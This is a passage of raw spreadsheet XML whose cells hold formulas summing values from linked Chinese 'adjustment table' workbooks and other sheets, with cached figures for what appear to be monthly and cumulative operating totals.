        <v>0.0200000000004366</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'31'!H6</f>
        <v>11871.02</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>288220.98</v>
      </c>
      <c r="J6" s="194">
        <f>[10]调整表!$I$23+[11]调整表!$I$17+[12]调整表!$I$17+[13]调整表!$I$25+[14]调整表!$E$23+[14]调整表!$E$30+[15]调整表!$H$7</f>
        <v>0</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'31'!K6</f>
        <v>23039.03</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>285236.73</v>
      </c>
      <c r="M6" s="194">
        <f>[10]调整表!$L$23+[11]调整表!$L$17+[12]调整表!$L$17+[13]调整表!$L$25+[14]调整表!$H$23+[14]调整表!$H$30+[15]调整表!$K$7</f>
        <v>20944.83</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>[10]调整表!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>[10]调整表!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>[10]调整表!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>[10]调整表!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>[10]调整表!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>[10]调整表!$V$102</f>
        <v>32.4794406392694</v>
      </c>
      <c r="X6" s="198">
        <f>[10]调整表!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>[10]调整表!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>[10]调整表!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>[12]调整表!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>[12]调整表!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'31'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>[12]调整表!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'31'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>[12]调整表!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>[10]调整表!$W$107</f>
        <v>0</v>
      </c>
      <c r="S7" s="202">
        <f>[10]调整表!$X$107</f>
        <v>125.600949313443</v>
      </c>
      <c r="T7" s="198">
        <f>[10]调整表!$Y$107</f>
        <v>131.25975586071</v>
      </c>
      <c r="U7" s="198">
        <f>[10]调整表!$T$107</f>
        <v>0</v>
      </c>
      <c r="V7" s="198">
        <f>[10]调整表!$U$107</f>
        <v>39.6438172043011</v>
      </c>
      <c r="W7" s="198">
        <f>[10]调整表!$V$107</f>
        <v>31.7394977168949</v>
      </c>
      <c r="X7" s="198">
        <f>[10]调整表!$Q$107</f>
        <v>0</v>
      </c>
      <c r="Y7" s="198">
        <f>[10]调整表!$R$107</f>
        <v>294.95</v>
      </c>
      <c r="Z7" s="198">
        <f>[10]调整表!$S$107</f>
        <v>2780.38</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>[10]调整表!$D$27+[11]调整表!$D$18+[13]调整表!$D$26+[14]调整表!$D$10+[14]调整表!$D$17+[15]调整表!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>[10]调整表!$E$27+[11]调整表!$E$18+[13]调整表!$E$26+[14]调整表!$E$10+[14]调整表!$E$17+[15]调整表!$E$9</f>
        <v>0.0499999999992724</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'31'!H8</f>
        <v>72204.05</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>597741.04</v>
      </c>
      <c r="J8" s="194">
        <f>[10]调整表!$I$27+[11]调整表!$I$18+[13]调整表!$I$26+[14]调整表!$E$25+[14]调整表!$E$32+[15]调整表!$H$9</f>
        <v>0</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'31'!K8</f>
        <v>79580.42</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>587325.13</v>
      </c>
      <c r="M8" s="194">
        <f>[10]调整表!$L$27+[11]调整表!$L$18+[13]调整表!$L$26+[14]调整表!$H$25+[14]调整表!$H$32+[15]调整表!$K$9</f>
        <v>34503.53</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>[10]调整表!$W$108</f>
        <v>0</v>
      </c>
      <c r="S8" s="198">
        <f>[10]调整表!$X$108</f>
        <v>121.650312221231</v>
      </c>
      <c r="T8" s="198">
        <f>[10]调整表!$Y$108</f>
        <v>126.657718650692</v>
      </c>
      <c r="U8" s="198">
        <f>[10]调整表!$T$108</f>
        <v>0</v>
      </c>
      <c r="V8" s="198">
        <f>[10]调整表!$U$108</f>
        <v>45.2016129032258</v>
      </c>
      <c r="W8" s="198">
        <f>[10]调整表!$V$108</f>
        <v>28.9172374429223</v>
      </c>
      <c r="X8" s="198">
        <f>[10]调整表!$Q$108</f>
        <v>0</v>
      </c>
      <c r="Y8" s="198">
        <f>[10]调整表!$R$108</f>
        <v>336.3</v>
      </c>
      <c r="Z8" s="198">
        <f>[10]调整表!$S$108</f>
        <v>2533.15</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>[10]调整表!$D$24+[11]调整表!$D$19+[12]调整表!$D$20+[13]调整表!$D$27+[14]调整表!$D$11+[14]调整表!$D$18+[15]调整表!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>[10]调整表!$E$24+[11]调整表!$E$19+[12]调整表!$E$20+[13]调整表!$E$27+[14]调整表!$E$11+[14]调整表!$E$18+[15]调整表!$E$10</f>
        <v>499.270000000004</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'31'!H9</f>
        <v>463479.46</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4598868.34</v>
      </c>
      <c r="J9" s="194">
        <f>[10]调整表!$I$24+[11]调整表!$I$19+[12]调整表!$I$20+[13]调整表!$I$27+[14]调整表!$E$26+[14]调整表!$E$33+[15]调整表!$H$10</f>
        <v>0</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'31'!K9</f>
        <v>484759.365</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4582238.176</v>
      </c>
      <c r="M9" s="194">
        <f>[10]调整表!$L$24+[11]调整表!$L$19+[12]调整表!$L$20+[13]调整表!$L$27+[14]调整表!$H$26+[14]调整表!$H$33+[15]调整表!$K$10</f>
        <v>89585.807</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>[10]调整表!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>[10]调整表!$X$109</f>
        <v>262.129479427813</v>
      </c>
      <c r="T9" s="198">
        <f>[10]调整表!$Y$109</f>
        <v>270.500810282931</v>
      </c>
      <c r="U9" s="198">
        <f>[10]调整表!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>[10]调整表!$U$109</f>
        <v>36.4569892473118</v>
      </c>
      <c r="W9" s="198">
        <f>[10]调整表!$V$109</f>
        <v>35.0094748858447</v>
      </c>
      <c r="X9" s="198">
        <f>[10]调整表!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>[10]调整表!$R$109</f>
        <v>271.24</v>
      </c>
      <c r="Z9" s="198">
        <f>[10]调整表!$S$109</f>
        <v>3066.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>[10]调整表!$D$25+[11]调整表!$D$20+[12]调整表!$D$21+[13]调整表!$D$28+[14]调整表!$D$12+[14]调整表!$D$19+[15]调整表!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>[10]调整表!$E$25+[11]调整表!$E$20+[12]调整表!$E$21+[13]调整表!$E$28+[14]调整表!$E$12+[14]调整表!$E$19+[15]调整表!$E$11</f>
        <v>0.659999999999854</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'31'!H10</f>
        <v>66326.66</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>983853.83</v>
      </c>
      <c r="J10" s="194">
        <f>[10]调整表!$I$25+[11]调整表!$I$20+[12]调整表!$I$21+[13]调整表!$I$28+[14]调整表!$E$27+[14]调整表!$E$34+[15]调整表!$H$11</f>
        <v>0</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'31'!K10</f>
        <v>88041.12</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>985269.84</v>
      </c>
      <c r="M10" s="194">
        <f>[10]调整表!$L$25+[11]调整表!$L$20+[12]调整表!$L$21+[13]调整表!$L$28+[14]调整表!$H$27+[14]调整表!$H$34+[15]调整表!$K$11</f>
        <v>39492.482</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>[10]调整表!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>[10]调整表!$X$110</f>
        <v>255.413159908187</v>
      </c>
      <c r="T10" s="198">
        <f>[10]调整表!$Y$110</f>
        <v>267.689871953356</v>
      </c>
      <c r="U10" s="198">
        <f>[10]调整表!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>[10]调整表!$U$110</f>
        <v>35.1344086021506</v>
      </c>
      <c r="W10" s="198">
        <f>[10]调整表!$V$110</f>
        <v>34.5372146118721</v>
      </c>
      <c r="X10" s="198">
        <f>[10]调整表!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>[10]调整表!$R$110</f>
        <v>261.4</v>
      </c>
      <c r="Z10" s="198">
        <f>[10]调整表!$S$110</f>
        <v>3025.46</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>[10]调整表!$D$26+[11]调整表!$D$21+[12]调整表!$D$19+[13]调整表!$D$29+[14]调整表!$D$13+[14]调整表!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>[10]调整表!$E$26+[11]调整表!$E$21+[12]调整表!$E$19+[13]调整表!$E$29+[14]调整表!$E$13+[14]调整表!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'31'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>[10]调整表!$I$26+[11]调整表!$I$21+[12]调整表!$I$19+[13]调整表!$I$29+[14]调整表!$E$28+[14]调整表!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'31'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>[10]调整表!$L$26+[11]调整表!$L$21+[12]调整表!$L$19+[13]调整表!$L$29+[14]调整表!$H$28+[14]调整表!$H$35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1600</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'31'!H12</f>
        <v>227074.170000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5169465.42</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>1103.32199999999</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'31'!K12</f>
        <v>525897.05</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5555003.426</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>139364.243000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>31.7458412300799</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>[16]调整表!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>[16]调整表!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>[16]调整表!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>[16]调整表!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>[16]调整表!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>[16]调整表!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>[16]调整表!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>[16]调整表!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>[16]调整表!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'31'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'31'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>25.5714207339543</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>[11]调整表!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>[11]调整表!$X$68</f>
        <v>264.915466659846</v>
      </c>
      <c r="T13" s="209">
        <f>[11]调整表!$Y$68</f>
        <v>266.288582387987</v>
      </c>
      <c r="U13" s="209">
        <f>[11]调整表!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>[11]调整表!$U$68</f>
        <v>52.5497311827957</v>
      </c>
      <c r="W13" s="209">
        <f>[11]调整表!$V$68</f>
        <v>69.9372146118722</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>[11]调整表!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>[11]调整表!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>[11]调整表!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3843.228</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'31'!H14</f>
        <v>89402.228</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1053945.904</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>0</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'31'!K14</f>
        <v>177263.228</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1970207.334</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>48773.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>[11]调整表!$W$71</f>
        <v>0</v>
      </c>
      <c r="S14" s="209">
        <f>[11]调整表!$X$71</f>
        <v>222.260786056245</v>
      </c>
      <c r="T14" s="209">
        <f>[11]调整表!$Y$71</f>
        <v>214.198924423986</v>
      </c>
      <c r="U14" s="209">
        <f>[11]调整表!$T$71</f>
        <v>0</v>
      </c>
      <c r="V14" s="209">
        <f>[11]调整表!$U$71</f>
        <v>46.885752688172</v>
      </c>
      <c r="W14" s="209">
        <f>[11]调整表!$V$71</f>
        <v>49.9466894977169</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>[11]调整表!$Q$71</f>
        <v>0.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>[11]调整表!$R$71</f>
        <v>348.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>[11]调整表!$S$71</f>
        <v>4375.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'31'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'31'!K15</f>
        <v>9668.522</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>124425.022</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>[11]调整表!$W$72</f>
        <v>0</v>
      </c>
      <c r="S15" s="209">
        <f>[11]调整表!$X$72</f>
        <v>62.9180855286523</v>
      </c>
      <c r="T15" s="209">
        <f>[11]调整表!$Y$72</f>
        <v>61.4562464126039</v>
      </c>
      <c r="U15" s="209">
        <f>[11]调整表!$T$72</f>
        <v>0</v>
      </c>
      <c r="V15" s="209">
        <f>[11]调整表!$U$72</f>
        <v>64.3373655913979</v>
      </c>
      <c r="W15" s="209">
        <f>[11]调整表!$V$72</f>
        <v>51.9083333333333</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>[11]调整表!$Q$72</f>
        <v>0.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>[11]调整表!$R$72</f>
        <v>478.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>[11]调整表!$S$72</f>
        <v>4547.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'31'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'31'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>[11]调整表!$W$73</f>
        <v>0</v>
      </c>
      <c r="S16" s="209">
        <f>[11]调整表!$X$73</f>
        <v>61.0193746521838</v>
      </c>
      <c r="T16" s="209">
        <f>[11]调整表!$Y$73</f>
        <v>62.7201850736321</v>
      </c>
      <c r="U16" s="209">
        <f>[11]调整表!$T$73</f>
        <v>0</v>
      </c>
      <c r="V16" s="209">
        <f>[11]调整表!$U$73</f>
        <v>65.2110215053763</v>
      </c>
      <c r="W16" s="209">
        <f>[11]调整表!$V$73</f>
        <v>53.4404109589041</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>[11]调整表!$Q$73</f>
        <v>0.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>[11]调整表!$R$73</f>
        <v>485.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>[11]调整表!$S$73</f>
        <v>4681.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'31'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'31'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>[12]调整表!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>[12]调整表!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>[12]调整表!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>[12]调整表!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>[12]调整表!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>[12]调整表!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>[12]调整表!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>[12]调整表!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>[12]调整表!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'31'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'31'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>[12]调整表!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>[12]调整表!$X$74</f>
        <v>217.982142857143</v>
      </c>
      <c r="T18" s="209">
        <f>[12]调整表!$Y$74</f>
        <v>221.669906370098</v>
      </c>
      <c r="U18" s="209">
        <f>[12]调整表!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>[12]调整表!$U$74</f>
        <v>15.0537634408602</v>
      </c>
      <c r="W18" s="209">
        <f>[12]调整表!$V$74</f>
        <v>7.69326484018265</v>
      </c>
      <c r="X18" s="209">
        <f>[12]调整表!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>[12]调整表!$R$74</f>
        <v>112</v>
      </c>
      <c r="Z18" s="209">
        <f>[12]调整表!$S$74</f>
        <v>673.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'31'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'31'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>[13]调整表!$W$72</f>
        <v>0</v>
      </c>
      <c r="S19" s="209">
        <f>[13]调整表!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>[13]调整表!$Y$72</f>
        <v>9.16666666666667e-6</v>
      </c>
      <c r="U19" s="209">
        <f>[13]调整表!$T$72</f>
        <v>0</v>
      </c>
      <c r="V19" s="209">
        <f>[13]调整表!$U$72</f>
        <v>6.95566325614791e-8</v>
      </c>
      <c r="W19" s="209">
        <f>[13]调整表!$V$72</f>
        <v>7.07116788321168e-7</v>
      </c>
      <c r="X19" s="209">
        <f>[13]调整表!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y19" s="209">
        <f>[13]调整表!$R$72</f>
        <v>3.1e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>[13]调整表!$S$72</f>
        <v>0.000372</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'31'!H20</f>
        <v>0</v>
      </c>
